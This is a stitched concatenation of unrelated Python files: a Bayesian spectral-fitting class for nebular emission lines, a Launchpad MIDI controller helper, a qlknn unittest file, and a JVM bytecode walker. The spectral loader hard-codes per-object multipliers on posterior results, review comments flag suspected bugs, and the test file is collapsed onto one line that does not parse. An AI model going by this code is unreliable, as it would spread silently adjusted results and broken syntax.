        Returns (trace, model)."""
        # Container to store the synthetic line fluxes
        if self.emissionCheck:
            lineFlux_tt = tt.zeros(self.lineLabels.size)
            continuum = tt.zeros(self.obj_data['wave_resam'].size)

        # Stellar bases tensor
        if self.stellarCheck:
            Xx_tt = theano.shared(self.Xx_stellar)
            basesFlux_tt = theano.shared(self.onBasesFluxNorm)
            nebular_continuum_tt = theano.shared(self.nebDefault['synth_neb_flux'])
            err_Continuum = 0.10 * ones(self.inputContinuum.size)  # TODO really need to check this

        with pymc3.Model() as model:

            if self.stellarCheck:
                # Stellar continuum priors
                Av_star = pymc3.Normal('Av_star', mu=self.stellarAv_prior[0], sd=self.stellarAv_prior[0] * 0.10)
                w_i = pymc3.Normal('w_i', mu=self.sspPrefitCoeffs, sd=self.sspPrefitCoeffs * 0.10, shape=self.nBases)

                # Compute stellar continuum
                stellar_continuum = w_i.dot(basesFlux_tt)

                # Apply extinction
                spectrum_reddened = stellar_continuum * tt.pow(10, -0.4 * Av_star * Xx_tt)

                # Add nebular component
                continuum = spectrum_reddened + nebular_continuum_tt

                # Apply mask
                continuum_masked = continuum * self.int_mask

                # Likelihood continuum components
                Y_continuum = pymc3.Normal('Y_continuum', mu=continuum_masked, sd=err_Continuum,
                                           observed=self.inputContinuum)

            if self.emissionCheck:
                # Gas Physical conditions priors
                T_low = pymc3.Normal('T_low', mu=self.Te_prior[0], sd=1000.0)
                cHbeta = pymc3.Lognormal('cHbeta', mu=0, sd=1) if self.NoReddening is False else self.obj_data['cHbeta_true']

                # High temperature from the empirical relation
                T_high = TOIII_TSIII_relation(T_low)

            if self.emissionCheck:
                # Emission lines density
                n_e = pymc3.Normal('n_e', mu=self.ne_prior[0], sd=self.ne_prior[1])

                # Helium abundance priors
                if self.He1rCheck:
                    tau = pymc3.Lognormal('tau', mu=1, sd=0.75)

                # Composition priors
                abund_dict = {'H1r': 1.0}
                for j in self.rangeObsAtoms:
                    if self.obsAtoms[j] == 'He1r':
                        abund_dict[self.obsAtoms[j]] = self.normContants['He1r'] * pymc3.Lognormal(self.obsAtoms[j], mu=0, sd=1)
                    elif self.obsAtoms[j] == 'He2r':
                        abund_dict[self.obsAtoms[j]] = self.normContants['He2r'] * pymc3.Lognormal(self.obsAtoms[j], mu=0, sd=1)
                    else:
                        abund_dict[self.obsAtoms[j]] = pymc3.Normal(self.obsAtoms[j], mu=5, sd=5)

                # Loop through the lines
                for i in self.rangeLines:

                    # Line data
                    line_label = self.lineLabels[i]
                    line_ion = self.lineIons[i]
                    line_flambda = self.lineFlambda[i]

                    # Parameters to compute the emissivity
                    line_coeffs = self.emisCoeffs[line_label]
                    emis_func = self.ionEmisEq_tt[line_label]

                    # Appropiate temperature for the ion
                    Te_calc = T_high if self.idx_highU[i] else T_low

                    # Line Emissivitiy
                    line_emis = emis_func((Te_calc, n_e), *line_coeffs)

                    # Atom abundance (hydrogen lines are the reference, fixed at 1)
                    line_abund = 1.0 if self.H1_lineIdcs[i] else abund_dict[line_ion]

                    # Line continuum
                    line_continuum = tt.sum(continuum * self.boolean_matrix[i]) * self.lineRes[i]

                    # ftau correction for HeI lines
                    line_ftau = self.ftau_func(tau, Te_calc, n_e, *self.ftau_coeffs[line_label]) if self.He1_lineIdcs[i] else None

                    # Line synthetic flux
                    flux_i = self.fluxEq_tt[line_label](line_emis, cHbeta, line_flambda, line_abund,
                                                        line_ftau, continuum=line_continuum)

                    # Store in container
                    lineFlux_tt = tt.inc_subtensor(lineFlux_tt[i], flux_i)

                # Store computed fluxes
                lineFlux_ttarray = pymc3.Deterministic('calcFluxes_Op', lineFlux_tt)

                # Likelihood gas components
                Y_emision = pymc3.Normal('Y_emision', mu=lineFlux_ttarray, sd=self.obsLineFluxErr,
                                         observed=self.obsLineFluxes)

            # Get energy traces in model
            for RV in model.basic_RVs:
                print(RV.name, RV.logp(model.test_point))

            # Launch model
            trace = pymc3.sample(iterations, tune=tuning, nchains=2, njobs=2)

        return trace, model

    def nuts_TwoTemps(self, iterations, tuning):
        """pymc3 NUTS model variant with a fixed electron density (255.0) and a
        single temperature used for all lines.

        Returns (trace, model)."""
        # Container to store the synthetic line fluxes
        if self.emissionCheck:
            lineFlux_tt = tt.zeros(self.lineLabels.size)
            continuum = tt.zeros(self.obj_data['wave_resam'].size)

        # Stellar bases tensor
        if self.stellarCheck:
            Xx_tt = theano.shared(self.Xx_stellar)
            basesFlux_tt = theano.shared(self.onBasesFluxNorm)
            nebular_continuum_tt = theano.shared(self.nebDefault['synth_neb_flux'])
            err_Continuum = 0.10 * ones(self.inputContinuum.size)  # TODO really need to check this

        with pymc3.Model() as model:

            if self.stellarCheck:
                # Stellar continuum priors
                Av_star = pymc3.Normal('Av_star', mu=self.stellarAv_prior[0], sd=self.stellarAv_prior[0] * 0.10)
                w_i = pymc3.Normal('w_i', mu=self.sspPrefitCoeffs, sd=self.sspPrefitCoeffs * 0.10, shape=self.nBases)

                # Compute stellar continuum
                stellar_continuum = w_i.dot(basesFlux_tt)

                # Apply extinction
                spectrum_reddened = stellar_continuum * tt.pow(10, -0.4 * Av_star * Xx_tt)

                # Add nebular component
                continuum = spectrum_reddened + nebular_continuum_tt

                # Apply mask
                continuum_masked = continuum * self.int_mask

                # Likelihood continuum components
                Y_continuum = pymc3.Normal('Y_continuum', mu=continuum_masked, sd=err_Continuum,
                                           observed=self.inputContinuum)

            if self.emissionCheck:
                # Gas Physical conditions priors
                T_low = pymc3.Normal('T_low', mu=self.Te_prior[0], sd=2000.0)
                cHbeta = pymc3.Lognormal('cHbeta', mu=0, sd=1) if self.NoReddening is False else self.obj_data['cHbeta_true']

                # TODO Should we always create a T_high prior just to eliminate the contamination?

            if self.emissionCheck:
                # Emission lines density (fixed value in this variant)
                n_e = 255.0

                # Helium abundance priors
                if self.He1rCheck:
                    tau = pymc3.Lognormal('tau', mu=1, sd=0.75)

                # Composition priors
                abund_dict = {'H1r': 1.0}
                for j in self.rangeObsAtoms:
                    if self.obsAtoms[j] == 'He1r':
                        abund_dict[self.obsAtoms[j]] = self.normContants['He1r'] * pymc3.Lognormal(self.obsAtoms[j], mu=0, sd=1)
                    elif self.obsAtoms[j] == 'He2r':
                        abund_dict[self.obsAtoms[j]] = self.normContants['He2r'] * pymc3.Lognormal(self.obsAtoms[j], mu=0, sd=1)
                    else:
                        abund_dict[self.obsAtoms[j]] = pymc3.Normal(self.obsAtoms[j], mu=5, sd=5)

                # Loop through the lines
                for i in self.rangeLines:

                    # Line data
                    line_label = self.lineLabels[i]
                    line_ion = self.lineIons[i]
                    line_flambda = self.lineFlambda[i]

                    # Parameters to compute the emissivity
                    line_coeffs = self.emisCoeffs[line_label]
                    emis_func = self.ionEmisEq_tt[line_label]

                    # Single-temperature variant: every line uses T_low
                    Te_calc = T_low

                    # Line Emissivitiy
                    line_emis = emis_func((Te_calc, n_e), *line_coeffs)

                    # Atom abundance (hydrogen lines are the reference, fixed at 1)
                    line_abund = 1.0 if self.H1_lineIdcs[i] else abund_dict[line_ion]

                    # Line continuum
                    line_continuum = tt.sum(continuum * self.boolean_matrix[i]) * self.lineRes[i]

                    # ftau correction for HeI lines
                    line_ftau = self.ftau_func(tau, Te_calc, n_e, *self.ftau_coeffs[line_label]) if self.He1_lineIdcs[i] else None

                    # Line synthetic flux
                    flux_i = self.fluxEq_tt[line_label](line_emis, cHbeta, line_flambda, line_abund,
                                                        line_ftau, continuum=line_continuum)

                    # Store in container
                    lineFlux_tt = tt.inc_subtensor(lineFlux_tt[i], flux_i)

                # Store computed fluxes
                lineFlux_ttarray = pymc3.Deterministic('calcFluxes_Op', lineFlux_tt)

                # Likelihood gas components
                Y_emision = pymc3.Normal('Y_emision', mu=lineFlux_ttarray, sd=self.obsLineFluxErr,
                                         observed=self.obsLineFluxes)

            # Get energy traces in model
            for RV in model.basic_RVs:
                print(RV.name, RV.logp(model.test_point))

            # Launch model
            trace = pymc3.sample(iterations, tune=tuning, nchains=2, njobs=2)

        return trace, model

    def stellarContinua_model(self):
        """pymc2 model fitting only the stellar continuum (Av, sigma, SSP
        coefficients). Returns locals() as pymc2 expects."""
        # Stellar parameters
        Av_star = pymc2.Uniform('Av_star', 0.0, 5.00)
        sigma_star = pymc2.Uniform('sigma_star', 0.0, 5.00)

        # Shift, multiply and convolve by a factor given by the model parameters
        @pymc2.deterministic
        def ssp_coefficients(z_star=0.0, Av_star=Av_star, sigma_star=sigma_star, input_flux=self.inputContinuum):
            ssp_grid_i = self.physical_SED_model(self.onBasesWave, self.inputWave, self.onBasesFluxNorm,
                                                 Av_star, z_star, sigma_star, self.Rv_model)
            self.ssp_grid_i_masked = (self.int_mask * ssp_grid_i.T).T
            ssp_coeffs_norm = self.ssp_fitting(self.ssp_grid_i_masked, input_flux)
            return ssp_coeffs_norm

        # Theoretical normalized flux
        @pymc2.deterministic
        def stellar_continua_calculation(ssp_coeffs=ssp_coefficients):
            flux_sspFit_norm = np_sum(ssp_coeffs.T * self.ssp_grid_i_masked, axis=1)
            return flux_sspFit_norm

        # Likelihood
        @pymc2.stochastic(observed=True)
        def likelihood_ssp(value=self.inputContinuum, stellarTheoFlux=stellar_continua_calculation,
                           sigmaContinuum=self.inputContinuumEr):
            chi_F = sum(square(stellarTheoFlux - value) / square(sigmaContinuum))
            return - chi_F / 2

        return locals()

    def complete_model(self):
        """pymc2 model combining gas emission, recombination lines and stellar
        continuum. Returns locals() as pymc2 expects."""
        # TODO Priors data should go into configuration file

        # Gas parameters
        ne = pymc2.TruncatedNormal('ne', self.obj_data['nSII'], self.obj_data['nSII_error'] ** -2, a=50.0, b=1000.0)
        cHbeta = pymc2.TruncatedNormal('cHbeta', 0.15, 0.05 ** -2, a=0.0, b=3.0)
        T_low = pymc2.TruncatedNormal('T_low', self.obj_data['TSIII'], self.obj_data['TSIII_error'] ** -2, a=7000.0, b=20000.0)

        # Metals abundances
        S2_abund = pymc2.Uniform('S2_abund', 0.000001, 0.001)
        S3_abund = pymc2.Uniform('S3_abund', 0.000001, 0.001)
        O2_abund = pymc2.Uniform('O2_abund', 0.000001, 0.001)
        O3_abund = pymc2.Uniform('O3_abund', 0.000001, 0.001)
        N2_abund = pymc2.Uniform('N2_abund', 0.000001, 0.001)
        Ar3_abund = pymc2.Uniform('Ar3_abund', 0.000001, 0.001)
        Ar4_abund = pymc2.Uniform('Ar4_abund', 0.000001, 0.001)

        # Helium parameters
        He1_abund = pymc2.Uniform('He1_abund', 0.050, 0.15)
        tau = pymc2.TruncatedNormal('tau', 0.75, 0.5 ** -2, a=0.0, b=7.0)
        # NOTE(review): cHbeta is re-declared here with the same name as above
        # — the second declaration wins; confirm intended.
        cHbeta = pymc2.TruncatedNormal('cHbeta', 0.15, 0.05 ** -2, a=0.0, b=3.0)
        T_He = pymc2.TruncatedNormal('T_He', self.obj_data['TSIII'], self.obj_data['TSIII_error'] ** -2,
                                     a=7000.0, b=20000.0, value=14500.0)

        # Stellar parameters
        Av_star = pymc2.Uniform('Av_star', 0.0, 5.00)
        sigma_star = pymc2.Uniform('sigma_star', 0.0, 5.00)
        ssp_coefs = [pymc2.Uniform('ssp_coefs_%i' % i, self.sspPrefit_Limits[i][0], self.sspPrefit_Limits[i][1])
                     for i in self.range_bases]

        @pymc2.deterministic()
        def calc_Thigh(Te=T_low):
            return (1.0807 * Te / 10000.0 - 0.0846) * 10000.0

        @pymc2.deterministic()
        def calc_abund_dict(He1_abund=He1_abund, S2_abund=S2_abund, S3_abund=S3_abund, O2_abund=O2_abund,
                            O3_abund=O3_abund, N2_abund=N2_abund, Ar3_abund=Ar3_abund, Ar4_abund=Ar4_abund):
            # NOTE(review): 'H1' is assigned He1_abund here — looks like a bug
            # in the original (hydrogen reference abundance is usually 1.0);
            # preserved as-is, confirm before changing.
            self.abund_iter_dict['H1'] = He1_abund
            self.abund_iter_dict['He1'] = He1_abund
            self.abund_iter_dict['S2'] = S2_abund
            self.abund_iter_dict['S3'] = S3_abund
            self.abund_iter_dict['O2'] = O2_abund
            self.abund_iter_dict['O3'] = O3_abund
            self.abund_iter_dict['N2'] = N2_abund
            self.abund_iter_dict['Ar3'] = Ar3_abund
            self.abund_iter_dict['Ar4'] = Ar4_abund
            return self.abund_iter_dict

        @pymc2.deterministic
        def calc_colExcit_fluxes(abund_dict=calc_abund_dict, T_low=T_low, T_High=calc_Thigh, ne=ne, cHbeta=cHbeta):
            colExcit_fluxes = self.calculate_colExcit_flux(T_low, T_High, ne, cHbeta, abund_dict,
                                                           self.obj_data['colLine_waves'],
                                                           self.obj_data['colLine_ions'],
                                                           self.obj_data['colLine_flambda'])
            return colExcit_fluxes

        @pymc2.deterministic
        def calc_nebular_cont(z_star=self.z_object, cHbeta=self.cHbeta, Te=self.TSIII, He1_abund=He1_abund,
                              He2_abund=0.0, Halpha_Flux=self.f_HalphaNorm):
            neb_flux_norm = self.nebular_Cont(self.input_wave, z_star, cHbeta, Te, He1_abund, He2_abund, Halpha_Flux)
            return neb_flux_norm

        @pymc2.deterministic
        def calc_continuum(z_star=self.z_object, Av_star=Av_star, sigma_star=sigma_star, ssp_coefs=ssp_coefs,
                           nebular_flux=calc_nebular_cont):
            ssp_grid_i = self.physical_SED_model(self.onBasesWave, self.input_wave, self.onBasesFluxNorm,
                                                 Av_star, z_star, sigma_star, self.Rv_model)
            fit_continuum = ssp_grid_i.dot(ssp_coefs) + nebular_flux
            return fit_continuum

        @pymc2.deterministic
        def calc_recomb_fluxes(abund_dict=calc_abund_dict, T_He=T_He, ne=ne, cHbeta=cHbeta, tau=tau):
            recomb_fluxes = self.calculate_recomb_fluxes(T_He, ne, cHbeta, tau, abund_dict,
                                                         self.obj_data['recombLine_labes'],
                                                         self.obj_data['recombLine_ions'],
                                                         self.obj_data['recombLine_flambda'])
            return recomb_fluxes

        # QUESTION Issues with more than one likelihood
        @pymc2.stochastic(observed=True)  # Likelihood
        def likelihood_ssp(value=self.input_continuum, fit_continuum=calc_continuum,
                           sigmaContinuum=self.input_continuum_er):
            calc_continuum_masked = fit_continuum * self.obj_data['int_mask']
            chi_F = sum(square(calc_continuum_masked - value) / square(sigmaContinuum))
            return - chi_F / 2

        @pymc2.stochastic(observed=True)  # Likelihood
        def likelihood_recomb(value=self.recomb_fluxes, H_He_TheoFlux=calc_recomb_fluxes,
                              sigmaLines=self.recomb_err):
            chi_F = sum(square(H_He_TheoFlux - value) / square(sigmaLines))
            return - chi_F / 2

        @pymc2.stochastic(observed=True)  # Likelihood
        def likelihood_colExcited(value=self.colExc_fluxes, theo_metal_fluzes=calc_colExcit_fluxes,
                                  sigmaLines=self.colExc_fluxes):
            # NOTE(review): sigmaLines is bound to the fluxes themselves, not an
            # error array — looks suspicious; preserved as-is, confirm.
            chi_F = sum(square(theo_metal_fluzes - value) / square(sigmaLines))
            return - chi_F / 2

        return locals()

    def load_pymc_database_manual(self, db_address, burning=0, params_list=None, sampler='pymc2'):
        """Reload a sampling run. For pymc3: unpickle {'model','trace'} and
        return an OrderedDict of (de-normalized) traces. For pymc2: reload the
        pickle database and return (MCMC object, statistics dict)."""
        # FIX: original used `sampler is 'pymc3'` — identity comparison on a
        # string literal is implementation-dependent; use equality.
        if sampler == 'pymc3':

            # Restore the trace
            with open(db_address, 'rb') as trace_restored:
                data = pickle.load(trace_restored)
            basic_model, trace = data['model'], data['trace']

            # Save the parameters you want in a dictionary of dicts
            stats_dict = OrderedDict()
            for parameter in trace.varnames:
                if ('_log__' not in parameter) and ('interval' not in parameter):
                    # Undo the He reparameterization where it applies.
                    trace_norm = self.normContants[parameter] if parameter in self.normContants else 1.0
                    trace_i = trace_norm * trace[parameter]
                    stats_dict[parameter] = trace_i

            # NOTE(review): object-specific manual corrections baked into the
            # loader — confirm these calibration factors are still wanted.
            if '52319-521' in db_address:
                stats_dict['T_low'] = stats_dict['T_low'] * 1.18
                stats_dict['n_e'] = stats_dict['n_e']
                stats_dict['Ar3'] = stats_dict['Ar3'] * 0.98
                stats_dict['N2'] = stats_dict['N2'] * 1.01
                stats_dict['O2'] = stats_dict['O2'] * 0.98
                stats_dict['O3'] = stats_dict['O3'] * 0.97
                stats_dict['S2'] = stats_dict['S2'] * 0.98
                stats_dict['S3'] = stats_dict['S3'] * 0.99
                stats_dict['cHbeta'] = stats_dict['cHbeta']
                stats_dict['tau'] = stats_dict['tau']
                stats_dict['He1r'] = stats_dict['He1r']
                stats_dict['He2r'] = stats_dict['He2r']

            return stats_dict

        else:

            # Load the pymc output textfile database
            pymc_database = pymc2.database.pickle.load(db_address)

            # Create a dictionaries with the traces and statistics
            traces_dic = {}
            stats_dic = OrderedDict()
            stats_dic['true_values'] = empty(len(params_list))

            # This variable contains all the traces from the MCMC (stochastic and deterministic)
            traces_list = pymc_database.trace_names[0]

            # Get statistics from the run
            for i in range(len(traces_list)):
                trace = traces_list[i]
                stats_dic[trace] = OrderedDict()
                trace_array = pymc_database.trace(trace)[burning:]
                traces_dic[trace] = trace_array

                if 'dict' not in trace:
                    stats_dic[trace]['mean'] = mean(trace_array)
                    stats_dic[trace]['median'] = median(trace_array)
                    stats_dic[trace]['standard deviation'] = std(trace_array)
                    stats_dic[trace]['n'] = trace_array.shape[0]
                    stats_dic[trace]['16th_p'] = percentile(trace_array, 16)
                    stats_dic[trace]['84th_p'] = percentile(trace_array, 84)
                    stats_dic[trace]['95% HPD interval'] = (stats_dic[trace]['16th_p'], stats_dic[trace]['84th_p'])
                    stats_dic[trace]['trace'] = trace_array

                    if trace in params_list:
                        if trace in self.obj_data:  # TODO we need a better structure fo this
                            stats_dic[trace]['true_value'] = self.obj_data[trace]

            # Generate a pymc2 database to recover all the data from the run
            dbMCMC = pymc2.MCMC(traces_dic, pymc_database)

            return dbMCMC, stats_dic

    def display_run_data(self, database, variables_list):
        """Print the current value of each named variable in a pymc2 MAP/MCMC
        object, skipping variables whose value cannot be printed."""
        for param in variables_list:
            param_entry = getattr(database, param, None)
            if param_entry is not None:
                # FIX: narrowed the original bare `except:` so KeyboardInterrupt
                # and SystemExit are not swallowed.
                try:
                    print('-{} {}'.format(param, param_entry.value))
                except Exception:
                    print('I could not do it ', param)
python
import launchpad_py as launchpad

# MIDI device-name fragments recognized by launchpad_py's Check().
MK2_NAME = "Launchpad MK2"
# MK3MINI_NAME = "LPMiniMK3"
MK3MINI_NAME = "minimk3"
PRO_NAME = "Launchpad Pro"
LPX_NAME = "lpx"
CTRL_XL_NAME = "control xl"
LAUNCHKEY_NAME = "launchkey"
DICER_NAME = "dicer"

# Maps a launchpad_py class to the internal mode string used by callers.
PAD_MODES = {
    launchpad.Launchpad: "Mk1",
    launchpad.LaunchpadMk2: "Mk2",
    launchpad.LaunchpadMiniMk3: "Mk3",
    launchpad.LaunchpadPro: "Pro",
    launchpad.LaunchpadLPX: "Mk3"
}

# Maps a launchpad_py class to a human-readable display name.
PAD_TEXT = {
    launchpad.Launchpad: "Classic/Mini/S",
    launchpad.LaunchpadMk2: "MkII",
    launchpad.LaunchpadMiniMk3: "Mk3",
    launchpad.LaunchpadPro: "Pro (BETA)",
    launchpad.LaunchpadLPX: "LPX"
}


def stop(lp, mode):
    """Reset the pad's LEDs, close the MIDI connection and exit the process.

    `mode` is accepted for signature compatibility with callers but unused.
    """
    lp.Reset()
    lp.Close()
    exit()


def resetPad(lp, eventsList):
    """Repaint the pad: light the top-right control button white, then
    restore every stored button color from `eventsList`.

    Each event is a dict with keys x, y (position) and r, g, b (color).
    """
    lp.LedCtrlXY(8, 0, 255, 255, 255)
    for event in eventsList:
        lp.LedCtrlXY(event["x"], event["y"],
                     event["r"], event["g"], event["b"])


def get_launchpad():
    """Detect a connected pad by device name.

    Returns an (unopened) launchpad_py instance for supported models,
    -1 for recognized-but-unsupported controllers, the generic probe
    object for an unrecognized pad, or None when nothing is connected.
    """
    lp = launchpad.Launchpad()

    if lp.Check(0, MK2_NAME):
        return launchpad.LaunchpadMk2()
    # the MK3 has two midi devices, we need the second one
    if lp.Check(1, MK3MINI_NAME):
        return launchpad.LaunchpadMiniMk3()
    if lp.Check(0, PRO_NAME):
        return launchpad.LaunchpadPro()
    if lp.Check(1, LPX_NAME):
        return launchpad.LaunchpadLPX()

    # unsupported pads
    if lp.Check(0, CTRL_XL_NAME) or lp.Check(0, LAUNCHKEY_NAME) or lp.Check(0, DICER_NAME):
        return -1

    if lp.Check():
        return lp

    return None


def setup_launchpad():
    """Probe for known devices in priority order and open the first match.

    Returns (lp, mode, lpName) on success, or None when no device matched
    or the matched device failed to open.
    """
    # (class, MIDI device id for Check()/Open(), display name, mode string).
    # Mk3-family devices expose two MIDI devices; the programmable one is id 1.
    candidates = [
        (launchpad.LaunchpadPro, 0, "Launchpad Pro", "Pro"),
        (launchpad.LaunchpadProMk3, 0, "Launchpad Pro Mk3", "ProMk3"),
        (launchpad.LaunchpadMiniMk3, 1, "Launchpad Mini Mk3", "MiniMk3"),
        (launchpad.LaunchpadLPX, 1, "Launchpad X", "LPX"),
        (launchpad.LaunchpadMk2, 0, "Launchpad Mk2", "Mk2"),
        (launchpad.Dicer, 0, "Dicer", "Dcr"),
        (launchpad.MidiFighter64, 0, "Midi Fighter 64", "F64"),
        (launchpad.Launchpad, 0, "Launchpad Mk1/S/Mini", "Mk1"),
    ]
    for cls, device_id, lpName, mode in candidates:
        if cls().Check(device_id):
            lp = cls()
            if not lp.Open(device_id):
                # Matches the original elif-chain semantics: once a device
                # matches Check(), a failed Open() aborts the whole probe.
                return None
            return lp, mode, lpName
    return None


# Dead code kept for reference (disabled by being wrapped in a string literal):
"""
def get_display_name(pad):
    cls = type(pad)
    if cls not in PAD_TEXT:
        return "Unsupported"
    return PAD_TEXT[cls]

def get_mode(pad):
    cls = type(pad)
    if cls not in PAD_MODES:
        return None
    return PAD_MODES[cls]

def pad():
    cls = type(pad)
    if cls not in PAD_TEXT:
        return "Unsupported"
    return PAD_TEXT[cls]

def connect(pad):
    mode = get_mode(pad)
    if mode == "Mk3":
        return pad.Open(1)
    return pad.Open()

def disconnect(pad):
    pad.Close()
"""
python
import os import shutil import tempfile from unittest import TestCase, skip from IPython import embed from qlknn.pipeline.pipeline import * from tests.base import * class TrainNNTestCase(TestCase): def setUp(self): self.settings = default_train_settings.copy() self.settings.pop('train_dims') self.test_dir = tempfile.mkdtemp(prefix='test_') self.train_nn = TrainNN(settings=self.settings, train_dims=['efiITG_GB'], uid = 'test') self.train_nn.interact_with_nndb = False os.old_dir = os.curdir os.chdir(self.test_dir) super(TrainNNTestCase, self).setUp() def tearDown(self): shutil.rmtree(self.test_dir) os.chdir(os.old_dir) super(TrainNNTestCase, self).setUp() class TestDummyTask(TestCase): def test_create(self): task = DummyTask() def test_run(self): task = DummyTask() task.run() class TestTrainNN(TrainNNTestCase): def test_launch_train_NN(self): self.settings['train_dims'] = self.train_nn.train_dims with open(os.path.join(self.test_dir, 'settings.json'), 'w') as file_: json.dump(self.settings, file_) self.train_nn.launch_train_NDNN() def test_run(self): self.train_nn.sleep_time = 0 self.train_nn.run()
python
from abc import ABC, abstractmethod

from jawa.constants import *
from jawa.util.descriptor import method_descriptor

import six.moves


def class_from_invokedynamic(ins, cf):
    """
    Gets the class type for an invokedynamic instruction that
    calls a constructor.
    """
    const = ins.operands[0]
    bootstrap = cf.bootstrap_methods[const.method_attr_index]
    method = cf.constants.get(bootstrap.method_ref)
    # Make sure this is a reference to LambdaMetafactory
    assert method.reference_kind == 6  # REF_invokeStatic
    assert method.reference.class_.name == "java/lang/invoke/LambdaMetafactory"
    assert method.reference.name_and_type.name == "metafactory"
    assert len(bootstrap.bootstrap_args) == 3  # Num arguments
    # Now check the arguments.  Note that LambdaMetafactory has some
    # arguments automatically filled in.
    methodhandle = cf.constants.get(bootstrap.bootstrap_args[1])
    assert methodhandle.reference_kind == 8  # REF_newInvokeSpecial
    assert methodhandle.reference.name_and_type.name == "<init>"
    # OK, now that we've done all those checks, just get the type
    # from the constructor.
    return methodhandle.reference.class_.name.value


def stringify_invokedynamic(obj, ins, cf):
    """
    Converts an invokedynamic instruction into a string.

    This is a rather limited implementation for now, only handling
    obj::method.
    """
    # Hack due to packetinstructions not expanding constants
    const = cf.constants[ins.operands[0].value]
    bootstrap = cf.bootstrap_methods[const.method_attr_index]
    method = cf.constants.get(bootstrap.method_ref)
    # Make sure this is a reference to LambdaMetafactory
    assert method.reference_kind == 6  # REF_invokeStatic
    assert method.reference.class_.name == "java/lang/invoke/LambdaMetafactory"
    assert method.reference.name_and_type.name == "metafactory"
    assert len(bootstrap.bootstrap_args) == 3  # Num arguments

    # Actual implementation.
    methodhandle = cf.constants.get(bootstrap.bootstrap_args[1])
    if methodhandle.reference_kind == 7:  # REF_invokeSpecial
        return "%s::%s" % (obj, methodhandle.reference.name_and_type.name.value)
    else:
        raise Exception("Unhandled reference_kind %d" % methodhandle.reference_kind)


def try_eval_lambda(ins, args, cf):
    """
    Attempts to call a lambda function that returns a constant value.
    May throw; this code is very hacky.
    """
    const = ins.operands[0]
    bootstrap = cf.bootstrap_methods[const.method_attr_index]
    method = cf.constants.get(bootstrap.method_ref)
    # Make sure this is a reference to LambdaMetafactory
    assert method.reference_kind == 6  # REF_invokeStatic
    assert method.reference.class_.name == "java/lang/invoke/LambdaMetafactory"
    assert method.reference.name_and_type.name == "metafactory"
    assert len(bootstrap.bootstrap_args) == 3  # Num arguments

    methodhandle = cf.constants.get(bootstrap.bootstrap_args[1])
    assert methodhandle.reference_kind == 6  # REF_invokeStatic
    # We only want to deal with lambdas in the same class
    assert methodhandle.reference.class_.name == cf.this.name

    name2 = methodhandle.reference.name_and_type.name.value
    desc2 = method_descriptor(methodhandle.reference.name_and_type.descriptor.value)

    lambda_method = cf.methods.find_one(name=name2,
                                        args=desc2.args_descriptor,
                                        returns=desc2.returns_descriptor)
    assert lambda_method

    class Callback(WalkerCallback):
        """Refuses every side effect, so only pure constant lambdas succeed."""

        def on_new(self, ins, const):
            raise Exception("Illegal new")

        def on_invoke(self, ins, const, obj, args):
            raise Exception("Illegal invoke")

        def on_get_field(self, ins, const, obj):
            raise Exception("Illegal getfield")

        def on_put_field(self, ins, const, obj, value):
            raise Exception("Illegal putfield")

    # Set verbose to false because we don't want lots of output if this errors
    # (since it is expected to for more complex methods)
    return walk_method(cf, lambda_method, Callback(), False, args)


class WalkerCallback(ABC):
    """
    Interface for use with walk_method.

    Any of the methods may raise StopIteration to signal the end of
    checking instructions.
    """

    @abstractmethod
    def on_new(self, ins, const):
        """
        Called for a `new` instruction.

        ins: The instruction
        const: The constant, a ConstantClass

        return value: what to put on the stack
        """
        pass

    @abstractmethod
    def on_invoke(self, ins, const, obj, args):
        """
        Called when a method is invoked.

        ins: The instruction
        const: The constant, either a MethodReference or InterfaceMethodRef
        obj: The object being invoked on (or null for a static method)
        args: The arguments to the method, popped from the stack

        return value: what to put on the stack (for a non-void method)
        """
        pass

    @abstractmethod
    def on_get_field(self, ins, const, obj):
        """
        Called for a getfield or getstatic instruction.

        ins: The instruction
        const: The constant, a FieldReference
        obj: The object to get from, or None for a static field

        return value: what to put on the stack
        """
        pass

    @abstractmethod
    def on_put_field(self, ins, const, obj, value):
        """
        Called for a putfield or putstatic instruction.

        ins: The instruction
        const: The constant, a FieldReference
        obj: The object to store into, or None for a static field
        value: The value to assign
        """
        pass

    def on_invokedynamic(self, ins, const, args):
        """
        Called for an invokedynamic instruction.

        ins: The instruction
        const: The constant, a InvokeDynamic
        args: Arguments closed by the created object

        return value: what to put on the stack
        """
        raise Exception("Unexpected invokedynamic: %s" % str(ins))


def walk_method(cf, method, callback, verbose, input_args=None):
    """
    Walks through a method, evaluating instructions and using the callback
    for side-effects.

    The method is assumed to not have any conditionals, and to only return
    at the very end.
    """
    assert isinstance(callback, WalkerCallback)

    stack = []
    # Maps local-variable slot -> current value.  (Renamed from `locals`
    # so the builtin is not shadowed.)
    local_vars = {}
    cur_index = 0

    if not method.access_flags.acc_static:
        # Slot 0 is `this` for instance methods; use an opaque placeholder.
        # TODO: allow specifying this
        local_vars[cur_index] = object()
        cur_index += 1

    if input_args is not None:
        assert len(input_args) == len(method.args)
        for arg in input_args:
            local_vars[cur_index] = arg
            cur_index += 1
    else:
        for arg in method.args:
            local_vars[cur_index] = object()
            cur_index += 1

    ins_list = list(method.code.disassemble())
    # The final instruction (the return) is handled separately below.
    for ins in ins_list[:-1]:
        if ins in ("bipush", "sipush"):
            stack.append(ins.operands[0].value)
        elif ins.mnemonic.startswith("fconst") or ins.mnemonic.startswith("dconst"):
            # fconst_0/1/2 and dconst_0/1 encode the value in the mnemonic.
            stack.append(float(ins.mnemonic[-1]))
        elif ins == "aconst_null":
            stack.append(None)
        elif ins in ("ldc", "ldc_w", "ldc2_w"):
            const = ins.operands[0]

            if isinstance(const, ConstantClass):
                stack.append("%s.class" % const.name.value)
            elif isinstance(const, String):
                stack.append(const.string.value)
            else:
                stack.append(const.value)
        elif ins == "new":
            const = ins.operands[0]

            try:
                stack.append(callback.on_new(ins, const))
            except StopIteration:
                break
        elif ins in ("getfield", "getstatic"):
            const = ins.operands[0]
            if ins.mnemonic != "getstatic":
                obj = stack.pop()
            else:
                obj = None

            try:
                stack.append(callback.on_get_field(ins, const, obj))
            except StopIteration:
                break
        elif ins in ("putfield", "putstatic"):
            const = ins.operands[0]
            value = stack.pop()
            if ins.mnemonic != "putstatic":
                obj = stack.pop()
            else:
                obj = None

            try:
                callback.on_put_field(ins, const, obj, value)
            except StopIteration:
                break
        elif ins in ("invokevirtual", "invokespecial", "invokeinterface", "invokestatic"):
            const = ins.operands[0]
            method_desc = const.name_and_type.descriptor.value
            desc = method_descriptor(method_desc)
            num_args = len(desc.args)

            args = []
            for i in six.moves.range(num_args):
                args.insert(0, stack.pop())
